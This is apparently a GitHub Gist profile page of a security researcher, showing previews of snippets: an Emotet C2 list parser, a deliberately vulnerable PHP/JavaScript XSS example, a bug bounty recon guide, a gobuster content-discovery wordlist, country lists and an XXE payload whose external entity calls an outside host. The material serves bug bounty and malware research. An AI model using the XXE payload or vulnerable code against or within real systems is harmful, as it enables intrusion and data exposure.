Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

HUNTER SaFiSec

🎯
Focusing
  • Ethical Hacker
  • internet
View GitHub Profile
View emotet_c2_parser.py
import socket
import struct
def dump_c2_list(c2_list):
for i in range(0xFFFFFF):
ip = Dword(c2_list + (i*8))
if ip == 0:
break;
View HTMLEntitiesBypass.php
<!DOCTYPE html>
<!-- Vulnerable Code-->
<html>
<body>
<script>
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>");
</script>
@SaFiSec
SaFiSec / github_bugbountyhunting.md
Created Jul 17, 2019 — forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.
View github_bugbountyhunting.md

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@SaFiSec
SaFiSec / raree.md
Created May 31, 2020 — forked from nonohry/raree.md
Awesome Collection Of Rare Hacking E-Books And PDF || 2018 Latest
View raree.md
@SaFiSec
SaFiSec / countries
Created Jun 2, 2020 — forked from kalinchernev/countries
Plain text list of countries
View countries
Afghanistan
Albania
Algeria
Andorra
Angola
Antigua & Deps
Argentina
Armenia
Australia
Austria
@SaFiSec
SaFiSec / README.markdown
Created Jun 2, 2020 — forked from marijn/README.markdown
List of countries in YAML, CSV and TXT format
View README.markdown
@SaFiSec
SaFiSec / countries-hash.js
Created Jun 2, 2020 — forked from amabes/countries-hash.js
Countries Object (ES6)
View countries-hash.js
export const countries = {
AF: 'Afghanistan',
AL: 'Albania',
DZ: 'Algeria',
AS: 'American Samoa',
AD: 'Andorra',
AO: 'Angola',
AI: 'Anguilla',
AQ: 'Antarctica',
AG: 'Antigua And Barbuda',
@SaFiSec
SaFiSec / content_discovery_all.txt
Created Sep 10, 2020 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
View content_discovery_all.txt
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>